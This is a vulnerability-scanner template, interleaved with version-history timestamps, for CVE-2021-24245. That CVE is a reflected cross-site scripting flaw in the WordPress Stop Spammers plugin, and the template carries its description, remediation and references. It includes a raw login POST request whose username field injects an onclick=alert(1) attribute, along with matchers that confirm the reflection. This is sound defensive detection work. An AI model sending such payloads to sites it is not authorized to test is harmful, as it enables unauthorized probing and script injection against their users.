2022-06-02 10:25:19 +00:00
id : CVE-2021-24245
info :
2022-09-08 13:28:46 +00:00
name : WordPress Stop Spammers <2021.9 - Cross-Site Scripting
2022-06-02 10:25:19 +00:00
author : edoardottt
severity : medium
2022-09-08 13:28:46 +00:00
description : WordPress Stop Spammers plugin before 2021.9 contains a reflected cross-site scripting vulnerability. It does not escape user input when blocking requests (such as matching a spam word), thus outputting it in an attribute after sanitizing it to remove HTML tags.
2023-09-06 12:09:01 +00:00
remediation : |
Update to the latest version of the WordPress Stop Spammers plugin (2021.9 or later) to mitigate this vulnerability.
2022-06-02 10:38:50 +00:00
reference :
- https://packetstormsecurity.com/files/162623/WordPress-Stop-Spammers-2021.8-Cross-Site-Scripting.html
- https://wpscan.com/vulnerability/5e7accd6-08dc-4c6e-9d19-73e2d7e97735
2022-09-08 13:28:46 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-24245
2023-04-12 10:55:48 +00:00
- http://packetstormsecurity.com/files/162623/WordPress-Stop-Spammers-2021.8-Cross-Site-Scripting.html
2022-06-02 10:25:19 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2021-24245
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
epss-score : 0.00177
2023-10-14 11:27:55 +00:00
epss-percentile : 0.5458
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:trumani:stop_spammers:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : trumani
product : stop_spammers
2023-09-06 12:09:01 +00:00
framework : wordpress
2023-07-11 19:49:27 +00:00
tags : wpscan,cve,cve2021,wordpress,xss,wp-plugin,packetstorm
2022-06-02 10:25:19 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-06-02 10:25:19 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP+Cookie+check;
log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1
matchers-condition : and
matchers :
- type : word
part : header
words :
- "text/html"
- type : word
part : body
words :
2022-09-08 13:28:46 +00:00
- "ad\" accesskey=X onclick=alert(1)"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200